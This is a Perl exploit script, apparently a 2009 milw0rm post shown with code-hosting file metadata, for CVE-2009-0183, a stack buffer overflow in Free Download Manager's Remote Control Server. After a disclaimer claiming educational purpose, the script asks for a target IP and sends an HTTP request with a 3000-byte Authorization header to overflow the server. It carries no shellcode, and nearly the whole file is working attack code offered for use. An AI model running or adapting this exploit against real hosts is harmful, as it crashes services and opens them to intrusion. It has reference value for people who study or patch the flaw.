46 lines
No EOL
1.7 KiB
Perl
Executable file
46 lines
No EOL
1.7 KiB
Perl
Executable file
#!usr/bin/perl -w
|
|
|
|
#######################################################################################
|
|
# Stack-based buffer overflow in Remote Control Server in Free Download Manager
|
|
# (FDM) 2.5 Build 758 and 3.0 Build 844 allows remote attackers to execute
|
|
# arbitrary code via a long Authorization header in an HTTP request.
|
|
# Refer:
|
|
# http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0183
|
|
#
|
|
# To run this exploit on MS Windows replace "#!usr/bin/perl -w" with
|
|
# "#!Installation_path_for_perl -w" (say #!C:/Program Files/Perl/bin/perl -w)
|
|
#
|
|
#$$$$$This was strictly written for educational purpose. Use it at your own risk.$$$$$
|
|
#$$$$$Author will not bare any responsibility for any damages watsoever.$$$$$$$$$$$$$$
|
|
#
|
|
# Author: Praveen Darshanam
|
|
# Email: praveen[underscore]recker[at]sify.com\
|
|
# Blog: http://www.darshanams.blogspot.com/
|
|
# Date: 04th February, 2009
|
|
#
|
|
########Thanx to str0ke,milw0rm, @rp m@n, and all the security folks####################
|
|
########################################################################################
|
|
|
|
use IO::Socket;
|
|
|
|
print("\nEnter IP Address of Remote Control Server(not domain) FDM: \n");
|
|
$vuln_host_ip = <STDIN>;
|
|
|
|
|
|
$sock_http = IO::Socket::INET->new( PeerAddr => $vuln_host_ip,
|
|
PeerPort => 80,
|
|
Proto => 'tcp') || "Unable to create Socket for HTTP Connection";
|
|
|
|
$mal_buff="D"x3000;
|
|
|
|
$http_attack = "GET / HTTP/1.1\r\n".
|
|
"Host: $vuln_host_ip\r\n".
|
|
"Authorization:$mal_buff\r\n".
|
|
"Keep-Alive: 300\r\n".
|
|
"Connection: keep-alive\r\n\r\n";
|
|
|
|
print $sock_http $http_attack;
|
|
|
|
close($sock_http);
|
|
|
|
# milw0rm.com [2009-02-04] |